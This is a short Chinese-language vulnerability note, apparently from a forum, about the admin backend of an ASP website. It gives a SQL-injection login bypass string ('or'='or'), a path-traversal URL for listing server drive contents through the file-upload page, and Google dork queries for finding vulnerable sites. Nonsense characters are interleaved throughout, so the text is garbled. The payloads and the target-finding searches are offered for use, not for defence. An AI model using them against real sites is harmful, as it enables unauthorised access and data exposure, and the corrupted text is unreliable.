后台万能密码 'or'='or'
, I/ K2 t8 Q, |% p2 Y# Q( j$ q8 Y$ V' i8 S# s; |+ O) E& a+ I
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!( ~! ?2 u( t5 n2 U' h
admin/uploadfile.asp?currentFolder=/upfiles/../2 i) k C" i3 z6 a/ G( T! p
! c7 {9 `& |. |$ V) c6 g漏洞证明:
6 Y' d# y; F& y$ A
& {, Y; R8 ?9 `# _谷歌:inurl:type.asp?id=1 新闻中心) c- w& `! T9 V0 q* N4 b. v
或者 :inurl:download_ok.asp?, k( u% b$ @' H; c; f* ~6 n9 [
* q+ l. B5 m2 J. r0 |: @
|